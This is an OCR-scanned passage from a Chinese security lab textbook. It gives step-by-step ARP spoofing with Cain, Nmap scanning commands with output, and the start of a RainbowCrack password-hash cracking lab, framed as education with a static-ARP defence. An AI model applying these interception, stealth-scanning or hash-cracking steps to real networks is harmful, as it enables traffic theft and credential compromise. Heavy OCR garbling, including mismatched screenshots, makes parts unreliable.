图 1-12 显示 嗅 探 进度 
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步骤 7: 单 击 Cain 主 窗口 下 端的 APR 标签 ,在 出 现 的 对 话 框 中 单 击 Add to list 按钮 ， 
在 选项 框 中 选择 进行 ARP 欺骗 的 地 址 ,打开 如 图 1-13 所 示 的 对 话 框 。 在 左 侧 列表 中 选择 
被 欺骗 的 主机 ,上 青 在 右 侧 选择 合适 的 主机 (或 网 关 )。 在 该 实验 中 ,首先 在 左 侧 列表 中 选择 靶 
机 的 IP 地 址 ,然后 在 右 侧 列表 中 将 会 出 现 其 他 IP 地 址 ,如 果 在 右 侧 选择 网 关 192. 168. 1. 1. 
这 样 就 可 以 截获 所 有 从 靶 机 发 出 到 其 他 网 络 的 数据 包 。 


JL 


er | ES cw [y vienes [Ep ar | 
MAC address | Packet... | < Pac... | Mac address — |IP address 


S4EGFC69D27T 192. 168. 1.1 


-本 APR-SSH-1 (D) 
— B APR-HTTPS (0) 


i APR-ProxyHTTPS (0) 
-QA APR-RDP (0) 
-四 APR-FTPS (0) 
B APR-POP3S (D) 
i < Tn 
—B APR-IMAPS (0) 一 一 
APR-LDAPS (D) MAC address MAC address | IP address 


APR-SIPS (0) 


图 1-13 选取 被 欺骗 的 主机 


步骤 8: 单 击 工具 栏 上 的 Start/Stop ARP 按钮 ,Idle KÆ X Poisoning, Wh K| 1-14 所 示 ， 
开始 捕获 欺骗 数据 包 。 此 时 ,在 靶 机 上 进行 的 网 络 浏览 等 操作 ,都 会 在 攻击 机 的 Cain 界面 
上 显示 捕获 的 数据 。 

步骤 9: 登录 靶 机 ,检查 是 否 欺 骗 成 功 。 在 靶 机 的 命令 提示 符 下 输入 “ipconfig /all” 命 
令 , 将 显示 如 图 1-15 所 示 的 结果 ,可 以 看 到 本 机 网 卡 的 MAC 地 址 及 其 他 记录 信息 。 

再 在 靶 机 的 命令 提示 符 下 输入 "arp -a” 命 令 , 将 显示 如 图 1-16 所 示 的 信息 ,可 以 看 到 IP 
地 址 为 192.168. 1. 1 的 MAC 地 址 ,此 时 可 以 看 到 对 应 的 MAC 地 址 已 经 被 替换 为 攻击 机 网 
卡 的 MAC 地 址 ,ARP 欺骗 成 功 。 


1.2.4 任务 与 思考 


在 不 使 用 ARP 防护 软件 的 情况 下 ,如何 进行 ARP 欺骗 攻击 呢 ? 

最 稼 用 的 方法 是 在 同一 网 络 中 把 主机 和 网 关 进 行 IP 与 MAC 的 绑 定 。ARP 欺骗 是 通 
过 ARP 的 动态 映射 机 制 欺骗 同一 IP 子 网 中 的 机 器 ,所 以 如 果 把 ARP 全 部 设置 为 静态 就 可 
以 解决 对 内 网 主机 的 欺骗 ,同时 对 网 关 也 要 进行 IP 与 MAC 的 静态 绑 定 。 只 有 这 样 ,才能 
够 有 效 防 范 ARP 攻击 的 发 生 ,具体 方法 如 下 。 
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File View Configure Tools Help 
alele T. ^y 35,9mmumuascoeuoe? n 


INS EP cw 
e» APR IP address MÀC address MAC address IP address 


diei soning «(— 192.188. 1. 187 GCODAESSBCSE 1 1 S4EBFC69D27 192. 168. 1.1 


E APR-Cert 

„2, APR-DNS 

B APR-SSH-1 (D) 

Bj APR-HITPS (D) 

Bj APR-ProxyHTIPS (0) 
和 APR-RDP (0) 

O APR-FTPS (0) 

A APR-POP3S (D) € m 
O APR-IMAPS (0) 


3 APR-LDAPS (0) Status IP address MAC address Packet... MAC address IP address 
下 APR-SIPS (0) 


$i 
"a Configuration / Routed Packets 


B ss] n 


图 1-14 开始 欺骗 操作 


Host Name . . . . . . www-5d28aac4f e4 
Prinary Dns Suffix s 

Node Type . . . . . à Unknown 

IP Routing Enabled. No 

WINS Proxy Enabled. No 


Ethernet adapter 本 地 连接: 


Connection-specific Suf f ix 
Description . . . . 2 4-8 IntelCR» PRO/i18880 MI Network Connect 


Physical Address. 

Dhcp Enabled. . 

IP Address. . . 192.168.1.186 
Subnet Mask . . 255.255.255.0 
Default Gateway 192.168.1.1 
DNS Servers . . 192.168.1.1 


图 1-15 运行 “ipconfig /all” 命 令 后 的 显示 信息 
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ct C:\FINDOFS\system32\cad. exe 


:\Documents and Settings VMldministrator?arp -a 


Interface: 192.168.1.187 -—— 0x108803 
Internet fiddress Physical Address Type 

| 192.168.1. 54-e6-fc-69—-d2-77 dynamic 
192.168.1. 6c-26-24-b8-ed-4i dynamic 
192.168.1. 88-26-18-81-8b-89 dynamic 
192.168 .1. ec-a8-6b-2d-44-62 dynamic 
192.168.1. 0B8—e80-8f -c8-2b-81 dynamic 
192.168.1. 080-21-86-5a-809?—e6 dynamic 
192.168.1. ec—-a8-6b-2d-44-67 dynamic 
192.168.1. 1c-hb80-94-38-5'.7—52 dynamic 
192.168.1.12: 908-25-11-—67-ce-64 dynamic 
192.168.1. ec-a8-6b-2d-44-61 dynamic 
192.168.1. f4-ib-ai-d5-19-77 dynamic 
192.168.1. 88-21-—-5a-86-64-79 dynamic 
192.168.1.134 880-25—4d3-82-14d—-56 dynamic 
192.168.1.136 9a-an0-a0-800-80-080 invalid 
192.168.1.141 ec-a8-6b-2d-39-9a dynamic 


:NDocuments and Settings MAdministrator27arp -a 
Interface: 192.168.1.187 一 一 8x18883 


Internet fiddress Physical Address T ype 
192.168.1.1 6c-14-6e-52-c9-94 dynamic 


A 1-16 ”运行 “arp -a” 命 令 后 的 显示 信息 


对 每 台 主 机 进行 IJP 和 MAC 地 址 之 间 的 静态 绑 定 ,具体 通过 执行 "arp -s IP MAC 地 
itd dro: 如 执行 “arp -s 192. 168.10. 1 AA-AA-AA-AA-AA-AA” 命 令 。 当 成 功 设置 
后 ,在 主机 上 通过 执行 “arp -a” 命 令 , 可 以 看 到 相关 的 提示 。 


Internet Address Physical Address Type 
192.168.10.1 AA- AA- AA — AA — AA - AA static( 静 态 ) 


如 条 没 有 进行 绑 定 , 即 主机 配置 为 动态 映射 , 则 显示 以 下 类 似 的 信息 。 


Internet Address Physical Address Type 
192.168.10.1 AA- AA - AA — AA — AA - AA dynamic( 动 态 ) 


1.3. 端口 扫描 : 利用 Nmap 工具 进行 端口 扫描 


1.3.1 预备 知识 : Nmap 工具 介绍 


Nmap(Network Mapper) 最 早 是 Linux 下 的 网 络 扫 描 和 哩 探 工具 包 ,是 一 个 综合 的 、 功 
能 全 面 的 端口 扫 摘 工具 ,被 网 络 安全 专业 人 员 广 泛 使 用 。Nmap 工具 由 Fyodor 编写 并 维 
护 ,由 于 其 具备 稳定 性 和 灵活 性 ,是 渗透 测试 人 员 必 备 的 工具 。 
1. Nmap 工具 的 功能 


BR T mO HAR, Nmap 还 提供 了 以 下 功能 。 

CD 主机 发 现 。Nmap 可 以 用 来 查找 目标 网 络 中 的 在 线 主 机 。 默 认 情 况 下 ,Nmap 通过 
ICMP 回应 请 求 .向 443 端口 发 送 TCP SYN f, I8 80 端口 发 送 TCP ACK 包 和 ICMP 时 间 
难 请 求 方 式 发 现 目标 主机 。 

(2) 服务 /版 本 识别 。Nmap 发 现 端 口 后 ,可 以 进一步 检查 服务 协议 、 应 用 程序 名 称 、 版 
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本 号 .主机 名 、 设 备 类 型 和 操作 系统 等 信息 。 

(3) 操作 系统 识别 。Nmap 向 远程 主机 发 送 系 列 数据 包 , 并 检查 回应 信息 。 然 后 与 操 
作 系 统 指纹 数据 库 进行 比较 ,并 显示 匹配 结果 的 细节 。 

(4) 网 络 路 由 跟踪 。Nmap 通过 尽 可 能 到 达 目 标 系统 的 方式 确定 目标 系统 的 端口 和 协 
W. Nmap 路 由 跟踪 从 较 高 的 TTLCTime To Live, 生 存 时 间 ) 开 始 , 并 逐步 递减 直到 TTL 
到 达 0。 

(5) Nmap 脚本 引擎 。 使 用 脚本 引擎 ,Nmap 也 可 以 用 于 检查 网 络 服务 中 存在 的 漏洞 、 
枚 举目 标 系 统 资 源 等 操作 ,为 攻击 者 获取 基本 的 信息 。 

2. Nmap 扫描 方式 


Nmap 扫描 方式 主要 包括 以 下 几 种 类 型 。 

(1) Half-open scanning。 半 开放 扫描 (Half-open scanning) Nmap 默认 的 扫描 方式 ， 
该 方式 发 送 SYN 到 目标 端口 ,如果 收 到 SYN/ACK 回复 ,可 以 判断 端口 是 开放 的 ; 如 果 收 
到 RST 包 , 说 明 该 端口 是 关闭 的 ; 如 果 没 有 收 到 回复 ,那么 判断 端口 是 被 屏 项 的 (filtered)。 
因为 该 方式 仅 对 目标 主机 的 特定 端口 发 送 SYN 包 , 但 不 建立 完整 的 TCP 连接 ,所 以 相对 比 
较 隐 蔽 ,而且 效率 比较 高 ,适用 范围 广 。 

(2) TCP connect。 使 用 系统 网 络 API connect 回 目 标 主 机 的 端口 发 起 连接 ,如 果 无 法 
连接 ,说明 该 端口 关闭 。 该 方式 扫描 速度 比较 慢 , 而 且 由 于 建立 完整 的 TCP 连接 会 在 目标 
主机 上 留 下 记录 信息 ,缺乏 隐蔽 性 ,因此 TCP connect 是 TCP SYN 无 法 使 用 才 考 虑 选择 的 
A X. 

(3) TCP ACK scanning。 疝 目标 主机 的 端口 发 送 ACK 包 , 如 果 收 到 RST 包 , 说 明 该 
O A Jj k BE cs 如 果 没 有 收 到 RST 包 , 说 明 被 屏蔽。 该 方式 只 能 用 于 确定 防火 墙 
是 否 屏蔽 某 个 端口 ,可 以 辅助 TCP SYN 方式 判断 目标 主机 防火 墙 的 状况 。 

(4) TCP FIN/Xmas/NULL scanning, 3X 3 种 扫描 方式 称 为 秘密 扫描 (stealthy scan), 
因为 操作 过 程 相对 比较 隐蔽 ,FIN 扫描 问 目 标 主机 端口 发 送 的 TCP FIN 包 ( 或 Xmas tree 
包 , 或 NULL 包 ) ,如 果 收 不 到 对 方 的 RST 回复 包 ,那么 说 明 该 端口 是 关闭 的 。 

其 中 ,Xmas tree 包 是 指 flags 中 FIN URG PUSI 设置 为 1 的 TCP 包 ,NULL 包 是 指 所 
有 flags 都 为 0 的 TCP 包 。 

3. Nmap 参数 

Nmap 工具 的 主要 参数 如 下 。 

-sS/sT/sA/sW/sW: 指定 使 用 TCP SYN/CONNECT ( )/ACK/ window /Maimon 
Scans 的 方式 对 目标 主机 进行 扫描 。 

-sU: 指定 使 用 UDP 扫描 方式 确定 目标 主机 的 UDP 端口 状态 。 

-sN/sF/sX: 指定 使 用 TCP Null, FIN 和 Xmas scans 秘密 扫描 方式 协助 探测 对方 的 
TCP ig ERAS. 

-ssanflags < flags >: 定制 TCP £28 flags, 

-sI: 指定 使 用 idle scan 方式 扫描 目标 主机 (前 提 是 需要 找到 合适 的 zombie host), 

-sY/sZ: 使 用 SCTP INIT/cookie-ECHO 扫描 SCTP 协议 端口 的 开放 人 情况。 需要 说 明 
的 是 ,因为 SCTP(Stream Control Transmission Protocol, 流 控制 传输 协议 ) 在 实际 网 络 中 
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较 少 使 用 ,所 以 此 参数 的 使 用 也 较 少 。 

-b < FTP relay host >; 使 用 FTP bounce scan 扫描 方式 。 

-p < port ranges >: 扫 摘 指定 疹 口 ,如 -p22; -pl-65535; -pU: 53, 111, 137. T: 
21-192. 168. 1. 18080, S, 9 ,其 中 工 代 表 TCP,U 代表 UDP,S 代表 SCTP 协议 。 

-F: 快速 模式 (fast modo) , 仅 扫 摘编 号 为 前 100 的 端口 。 

-T: 不 进行 端口 随机 打 乱 的 操作 。 夺 无 该 参数 ,Nmap 会 将 要 扫描 的 端口 以 随机 顺序 方 
式 扫描 ,以 让 Nmap 的 扫描 不 易 被 对 方 防 火 墙 检测 到 。 

-top-ports < number >; 扫描 开放 概率 最 高 的 端口 。 默 认 情 况 下 ,Nmap 会 扫描 最 有 可 
能 被 使 用 的 1000 个 TCP 端口 。 

-port-ratio < ratio >: 扫描 指定 频率 以 上 的 端口 ,其 中 -sS 表示 使 用 TCP SYN 方式 扫描 
TCP Wi HO -sU 表示 扫描 UDP 端口 ,-T4 表示 时 间 级 别 配置 4 级 ,-top-ports 300 表示 扫描 
最 有 可 能 开放 的 300 个 端口 (TCP 和 UDP 分别 有 300 个 端口 )。 


1.3.2 实验 目的 和 条 件 


1. 实验 目的 
过 本 实验 ,读者 可 以 了 解 Nmap THAD BE RUM HI -3F3E38 IA FALE. 
Cs erg pment le 
(2) 探测 目标 主机 所 开放 的 端口 。 
(3) 通过 识别 新 的 服务 器 ,审核 网 络 的 安全 性 。 
(4) 探测 网 络 上 的 主机 。 
2. 实验 清单 及 软 硬 件 要 求 
本 实验 所 需要 的 软 硬 件 清 单 如 表 1-3 所 示 。 


X 1-3 Nmap 工具 应 用 实验 清单 


1 台 
EE 
E 
w Windows 7 
x 


1.3.3 实验 过 程 


步骤 1: 登录 Windows 7 EHAA ENL IP 地 址 。 进 入 Windows 7 操作 系统 的 靶 机 , 运 
行 XAMPP(Apache 十 MySQL 十 PHP 十 PERL) 工 具 ( 需 要 事先 安装 和 设置 ), 开 启 Apache 
和 MySQL 服务 ,然后 在 命令 提示 符 下 运行 “ipconfig” 命 令 , 查 看 靶 机 的 IP 地 址 ,显示 信息 
如 图 1-17 所 示 。 

步骤 2: 登录 Kali, 并 使 用 Nmap 工具 进行 端口 扫描 。 首 先进 入 Kali 攻击 机 ,使 用 
“ifconfig” 命 令 查看 攻击 机 的 IP 地 址 ,如 图 1-18 
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: Nisers sadnin»ipconfig 


lindows IP 配置 


以 太 网 适配器 本 地 连接 : 


: exanple.orqg 

: fe88::2a:d95d:47dd :17dbx11 
: 172.16.1.252 

: 255.255.255.0 

: 172.16.1.1 


n 


: 媒体 已 断 开 


: example.org 


,* Nisers admin > m 


图 1-17 ”运行 “ipconfig” 命 令 查看 靶 机 的 IP 地 址 


root@kali:~# ifconfig 
ethl Link encap:Ethernet  HWaddr 6c:91:d0:62:a31:01 
inet addr:172.16.1.243 ]Bcast:172.16.1.255 Mask :255 .255 .255.0 
inet6 addr: fe80::6e91:d0ff:fe62:a101/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST $MTU:1500 Metric:l 
RX packets:4291 errors:8O dropped:O overruns:O frame:O 
TX packets:19027 errors:O dropped:O overruns:O carrier:O 
collisions:O txqueuelen:1000 
RX bytes:482510 (471.2 KiB) TX bytes:1129889 (1.0 MiB) 


SOCOCOOOOQQOONNN 


ANNY 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:65536 Metric:1 

RX packets:134 errors:0 dropped:O overruns:O frame:0 
TX packets:134 errors:O dropped:O overruns:0 carrier:0 
collisions:O txqueuelen:0O 

RX bytes:6900 (6.7 KiB) TX bytes:6900 (6.7 KiB) 


n COCOS 


root(ükali:-£ B 


图 1-18 ”使 用 “ifconfig” 命 令 查看 攻击 机 的 IP 地址 


步骤 3: 在 攻击 机 中 输入 “nmap 172. 16. 1.252” 命 令 , 用 Nmap 进行 简单 扫描 。Nmap 默认 
发 送 一 个 ping 数据 包 , 用 来 探测 目标 主机 在 1 一 10 000 范围 内 所 开放 的 端口 ,如 图 1-19 所 示 。 


root@kali:~# nmap 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:11 EDT 
Nmap scan report for 172.16.1.252 

Host is up (0.00046s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE 

80/tcp open http 

443/tcp open https 

3306/tcp open mysql 

MAC Address: 6C:7D:5F:C3:2bE:01 (Unknown) 


Nmap done: 1 IP address (1 host up) scanned in 32.02 seconds 


图 1-19 ”使 用 “nmap 172. 16. 1. 252” 命 令 扫 描 目 标 主 机 
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步骤 A. ni 1-20 所 示 $ A “nmap -vv 172. 16.1. 252" p . Hl. Nmap 进行 简单 扫描 ， 
并 详细 显示 返回 的 结果 。 其 中 ,-vv 参数 用 于 设置 对 返回 内 容 显示 其 详细 信息 。 


:~# nmap -vv 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:14 EDT 
Initiating ARP Ping Scan at 18:14 
Scanning 172.16.1.252 [1 port] 
Completed ARP Ping Scan at 18:14, 0.20s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 18:14 
Completed Parallel DNS resolution of 1 host. at 18:14, 13.00s elapsed 
Initiating SYN Stealth Scan at 18:14 
Scanning 1/2.16.1.252 [1000 ports] 
Discovered open port 443/tcp on 172.16.1.252 
Discovered open port 80/tcp on 17/2.16.1.252 
Discovered open port 3306/tcp on 1/2.16.1.252 
Completed SYN Stealth Scan at 18:14, 19.92s elapsed (1000 total ports) 
Nmap scan report for 172.16.1.252 
Host is up, received arp-response (0.00046s latency). 
Scanned at 2018-05-15 18:14:03 EDT for 33s 
Not shown: 997 filtered ports 
Reason: 997 no-responses 
PORT STATE SERVICE REASON 
open http syn-ack ttl 128 
open https syn-ack ttl 128 
3306/tcp open mysql syn-ack ttl 128 
MAC Address: 6C:7D:5F:C3:2bE:01 (Unknown) 


1-20 ”运行 “nmap -vv 172. 16. 1.252” 命 令 扫 描 目 标 主机 并 显示 详细 结果 


步骤 5: 输入 “nmap -sV 172. 16. 1.252” 命 令 , 用 Nmap 进行 版 本 探测 ,探测 结果 如 图 1-21 
所 示 。 


àI :~# nmap -sV 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:15 EDT 

Nmap scan report for 172.16.1.252 

Host is up (0.00049s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE VERSION 

80/tcp open http Apache httpd 2.4.7 ((Win32) OpenSSL/0.9.8y PHP/5.4.25) 


443/tcp open ssl/http Apache httpd 2.4.7 ((Win32) OpenSSL/0.9.8y PHP/5.4.25) 
3306/tcp open mysqL MySQL (unauthorized) 
MAC Address: sb tameo E ( Unknown) 


Service detection performed. Please report any incorrect results at https://nmap 
.Org/submit / 
Nmap done: 1 IP address (1 host up) scanned in 58.57 seconds 


1-21 运行 “nmap -sV 172. 16. 1. 252” 命 令 探 测 目标 主机 运行 的 版 本 号 


步骤 6. 输入 “nmap -version-intensity 3 172. 16. 1. 252” 命 令 , 对 指定 版 本 进行 深度 探 
测 ,运行 过 程 和 结果 如 图 1-22 所 示 。 其 中 ,指定 版 本 的 探测 强度 为 3( 范 围 为 0~~9) ,数值 越 
高 ,探测 服务 越 准 确 ,但 是 运行 时 间 也 比较 长 。 

步骤 7: 输入 “nmap -version-trace 172. 16. 1. 252" fp ^9 ,显示 详细 的 版 本 探测 过 程 和 结 
果 信 息 ,如 图 1-23 所 示 。 

步骤 8: 输入 “nmap -O 172. 16. 1. 252” 命 令 ,Nmap 通过 目标 开放 的 端口 探测 主机 所 运 
行 的 操作 系统 类 型 ,如 图 1-24 所 示 。 这 是 信息 收集 中 很 重要 的 一 步 , 可 以 帮助 攻击 者 找到 
特定 操作 系统 上 是 否 有 漏洞 。 
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L:=# nmap -version-intensity 3 172.16.1.252 


Starting Nmap 6[49BETA4 ( https://nmap.org ) at 2018-05-15 18:20 EDT 
Nmap scan report for 172.16.1.252 
(0.00046s latency). 
: 997 filtered ports 
STATE SERVICE 
open http 
open https 
mysql 
MAC Address: 6C:7D:5F:C3:2bE:01 (Unknown) 


Nmap done: 1 IP address (1 host up) scanned in 31.98 seconds 


B] 1-22 运行 “nmap -version-intensity 3 172. 16. 1. 252” 命 令 进行 深度 探测 


:~# nmap -version-trace 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:33 EDT 
PORTS: Using top 1000 por 人 found open (TCP:1000, UDP:0, SCTP:0) 
Timing report 
hostgroups: min 1, max 100000 
rtt-timeouts: init 1000, min 100, max 10000 
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 
parallelism: min O, max © 
max-retries: 10, host-timeout: 0 
max-rate: O 


filter (device ethl): arp and arp[18:4] = 0x6C91D062 and arp[22:2 


Overall sending rates: 5.01 packets / s, 210.43 bytes / s. 
mass rdns: Using DNS server 17/2.16.1.199 

mass dns: warning: got a READ:ERROR in read evt handler() 
mass dns: warning: got a READ:ERROR in read evt handler() 


图 1-23 ”运行 “nmap -version-trace 172. 16. 1. 252” 命 令 显 示 详 细 的 版 本 信息 


L :-4 nmap -0 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:34 EDT 
Nmap scan report for 172.16.1.252 
(0.00050s latency). 

: 997 filtered ports 

STATE SERVICE 

open http 
443/tcp open https 
3306/tcp open mysql 
MAC Address: 6C:/D:5F:C3:2bE:01 (Unknown) 
arning: OSScan results may be unreliable because we could not find at least 1 o 
pen and 1 closed port 
Device type: general purpose |phone 
Running: Microsoft Windows 2008 |/|Phone|Vista 
OS CPE: cpe:/o:microsoft:windows server 2008::beta3 cpe:/o:microsoft:windows ser 
ver 2008 cpe:/o:microsoft:windows /::-:professional cpe:/o:microsoft:windows 8 c 
pe:/o:microsoft:windows cpe:/o:microsoft:windows vista::- cpe:/o:microsoft :windo 
ws vista::spl 
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Windows Server 2008 R2 
, Microsoft Windows / Professional or Windows 8, Microsoft Windows Phone 7.5 or 
8.0, Microsoft Windows Vista SPO or SP1, Windows Server 2008 SP1, or Windows 7, 


图 1-24 运行 “nmap -O 172. 16. 1. 252” 命 令 探 测 主机 所 运行 的 操作 系统 类 型 
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步骤 9: 输入 “nmap -osscan-guess 172. 16. 1. 252" p 4 ,大 胆 猜测 对 方 主 机 的 操作 系统 
类 型 ,运行 结果 如 图 1-25 所 示 。 此 操作 的 准确 性 会 降低 ,但 会 尽 可 能 多 地 为 用 户 提 供 潜 在 
的 操作 系统 类 型 。 


kall:~# npap -osscan-guess 17/2.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:40 EDT 
Nmap scan report for 172.16.1.252 
Host is up (0.00055s latency). 
Not shown: 997 filtered ports 
STATE SERVICE 
open http 


3306/tcp open mysql 
MAC Address: 6C:7D:5F:C3:2bE:01 (Unknown) 


1-25 ”运行 “nmap -osscan-guess 172. 16.1. 252” 命 令 探 测 潜 在 的 操作 系统 类 型 


1.3.4 任务 与 思 


攻击 者 要 确定 一 个 网 络 的 整体 架构 ,可 以 使 用 Ping 扫描 和 TCP SYN 扫描 。Ping 扫描 
通过 发 送 ICMP(Internet Control Message Protocol, Internet 控制 消息 协议 ) 回 应 请 求 数据 
包 和 TCP 应 答 (Acknowledge,ACK) 数 据 包 ,确定 主机 的 状态 ,非常 适合 检测 指定 网 段 内 正 
在 运行 的 主机 数量 。 

使 用 TCP SYN 扫描 时 ,扫描 器 向 目标 主机 的 一 个 端口 发 送 请 求 连接 的 SYN 包 ,扫描 
is TE C8] SYN/ACK 后 ,不 是 发 送 ACK 应 答 而 是 发 送 RST 包 请 求 断 开 连 接 。 这 样 ,TCP 
三 次 握手 就 没有 完成 ,无 法 建立 正常 的 TCP 连接 ,因此 ,这 次 扫描 就 不 会 被 记录 到 系统 日 志 
中 。 这 种 扫描 技术 一 般 不 会 在 目标 主机 上 留 下 扫描 痕迹 ,但 是 需要 有 root 权限 。 


1.4 离线 攻击 工具 : 彩 蚜 表 破 解 
1.4.1 预备 知识 : 彩虹 表 


1. 彩虹 表 
彩虹 表 (Rainbow Table) 是 一 种 破解 Hash 困 数 的 技术 。 利 用 彩虹 表 技 术 , 可 以 针对 不 
同 的 Hash 函数 存在 的 漏洞 进行 骏 力 破解 。 例 如 ,对 于 Windows 操作 系统 中 经 过 LM- 
Hash 或 NTLM-Hash 加 密 处 理 后 的 SAM 文件 ,可 以 通过 相应 的 彩虹 表 工 具 进 行 破解 。 
彩虹 表 破 解 是 通过 具体 的 彩虹 表 破 解散 列 数据 的 工具 , 它 采 用 空间 换 时 间 的 技术 思想 ， 
其 方法 不 同 于 骏 力 破解 攻击 。 雄 力 破 解 攻击 会 将 密码 可 能 出 现 的 值 形 成 一 本 字典 ,然后 
一 个 接 一 个 地 计算 散 列 值 ,并 与 目标 散 列 值 进行 对 比 。 如 果 两 个 散 列 值 相同 ,就 枚 举 出 
了 密码 。 
又 力 破解 法 比 空 间 换 时 间 的 技术 慢 得 多 ,因为 攻击 者 要 计算 散 列 值 ,然后 进行 匹配 。 而 
使 用 空间 换 时 间 的 技术 ,所 有 可 能 的 散 列 值 已 经 预先 计算 完毕 ,攻击 者 要 进行 的 只 是 匹配 流 
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程 ,而 匹配 是 一 种 快速 完成 的 运算 。 

BackTrack 包含 以 下 3 种 彩虹 表 。 

(D Rtgen: 用 于 生成 彩虹 表 , 即 通常 所 讲 的 预计 算 的 阶段 。 彩 虹 表 包含 字典 、 散 列 、 散 
列 算法 及 字典 长 度 范围 。 

(2) Rtsoft; 用 于 整理 rtgen 生成 的 彩虹 表 。 

(3) Rerack: 用 于 在 彩虹 表 中 查找 某 个 散 列 值 。 

2. RainbowCrack 

RainbowCrack 是 一 个 使 用 内 存 时 间 交 换 技 术 (Time-Memory Trade-Off Technique) 加 
速 口 令 破 解 过 程 的 口令 破解 项。RainbowCrack 使 用 了 彩虹 表 , 即 一 张 预 先 计 算 好 的 明文 和 
散 列 值 的 对 照 表 。 通 过 预先 创建 彩虹 表 ,能 够 在 以 后 破解 口令 时 节约 大 量 的 时 间 。 

RainbowCrack 包含 以 下 实用 程序 。 

(1) rtgen. exe: 彩虹 表 生 成 硕 , 生 成 口令 MIMAX EK. 

(2) rtsort. exe; 排序 彩虹 表 ,为 rcrack. exe 提供 输入 。 

(3) rcrack. exe: 使 用 排 好 序 的 彩虹 表 进 行 口令 破解 。 


1.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 掌握 以 下 内 容 。 

(1) 学 习 BackTrack5 的 功能 和 基本 使 用 方法 。BackTrack5 是 网 络 安全 领域 非常 着 名 
的 黑客 攻击 平台 ,是 一 个 封 交 好 的 Linux 操作 系统 ,内 置 了 大 量 的 网 络 安全 检测 工具 及 黑客 

破解 软件 等 。 

(2) 掌握 RainbowCrack 的 使 用 方法 。 

(3) 使 用 彩虹 表 破 解散 列 值 。 

2. 实验 清单 及 软 硬 件 要 求 

本 实验 所 需要 的 软 硬 件 清 单 如 表 1-4 所 示 。 


表 1-4 彩虹 表 破 解 实 验 清单 


类 型 序 号 软 硬 件 要 求 规 格 


|. 1 数量 — | 1 人 台 
m EE NEN 操作 系统 版 本 BackTrack 5(BT5) 
EE EN 软件 版 本 RainbowCrack 


1.4.3 实验 过 程 


步骤 1: 登录 BackTrack 5( 应 事先 安装 和 配置 ) 靶 机 。 为 了 方便 操作 ,对 于 命令 提示 符 
不 是 非常 熟悉 的 读者 ,可 以 输入 “startx” 命 令 , 打 开 BackTrack 5 图 形 用 户 界面 ,如 图 1-26 
和 图 1-27 所 示 。 


2Z 


ua m m 
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à 
DE 


x 6174341 Cdron: Uniform CD-ROM driver Revision: 3.20 
1.619394] sda: unknown partition table 
1.620313] sr 1:0:0:0: Attached scsi generic sgi type 5 
1.621265] sd 0:0:0:0: [sda] fittached SCSI disk 
1.622204] Frecing unused kernel memory: 704k freed 
1.626980] Write protecting the kernel text: 5508k 
1.6332271 Write protecting the kernel read-only data: 2108k 
1.732386] Refined TSC clocksource calibration: 2666.356 MHz. 
ding, please uait... 
.875817] udeu: starting version 151 
.8801621 udeud (83): ^proc/83^/oon adj is deprecated, please use /proc/83^/oom score adj instead. 
. 112048] usb 1-1: neu full-speed USB device number 2 using uhci_hcd 
.359850] e1000: Intel(R) PRO/1000 Metuork Driver = version 7.3.21-k8-NAPI 
. 3608201 e1000: Copyright (c) 1999-2006 Intel Corporation. 
,388461] ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 
.3893671] e1000 0000:00:12.0: PCI INT f -> LinkEILNKB] -> GSI 10 (level, high) -> IRQ 10 
.672502] FDC 0 is a S82078B 
.687445] input: QEMU 1.0.50 QEMU USB Tablet as /devices/pci0000:00/0000 :00:01.2/usb1/1-1/1-1:1.0^7inpu 
/inputz 
2.689677] generic-usb 0003:0627:0001.0001: input,hidrauO: USB HID v0.01 Pointer [QEMU 1.0.50 QEMU USB 
ablet] on usb-0000:00:01.2-1/inputO 
2.691679] usbcore: registered new interface driver usbhid 
2.6926411 usbhid: USB HID core driver 
3.154412] ce1000 0000:00:12.0: eth0: (PCI:33MHz:3Z-bit) 6c:62:10:b6:6b:ec 
3.156065] e1000 0000:00:12.0: eth0: IntelXH) PRU/1000 Network Connection 
inux bt 3.2.6 #1 SMP Fri Feb 17? 10:40:05 EST 2012 i686 GNU/Linux 


FS I IIS IN RR 


["" r^ rm orm oro orm Chor ot tM 1 PP PP mmm 


System information disabled due to load higher than 1.9 
rootBbt: 48 startx 


图 1-26 BackTrack 5 字符 型 操作 模式 


Applications Places System [>] 1 EZ Sun jan 20, 12:28 PM 


zc 


Install BackTrack 


图 1-27 BackTrack 5 图 形 用 户 界 面 


$13x 网 络 攻防 基础 实 训 23 


步骤 2i: 打开 终端 (terminal) 操 作 窗 口 ,使 用 "cd / pentest/passwords/rainbowcrack" £i 
令 切 换 到 RainbowCrack 工作 目录 ,然后 使 用 "1s” 命 令 查看 ,如 图 1-28 所 示 。 
v X root@bt: /pentest/web/w3af 


i File Edit View Terminal Help 
| tübt:-4 cd /pentest/web/w3af/ à 


tGbt: /pentest/web/w3af$ ls 
core locales profiles scripts w3af console 
extlib plugins readme tools w3af gui 

te@bt: /pentest/web/w3af* 


图 1-28 ”切换 到 RainbowCrack 工作 目录 


步骤 3: 使 用 “. /rtgen” 命 令 查 看 帮助 文档 ,如 图 1-29 所 示 。 


^ ~ X root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


bt : /pentest/passwords/rainbowcrack£ ./rtgen 
RainbowCrack 1.5 
Copyright 2003-2018 RainbowCrack Project. All-rights-&eserved. 
Official Website: http://project-rainbowcrack. com/ 


usage: rtgen hash algorithm charset plaintext len min-ptaintextWen max table in 
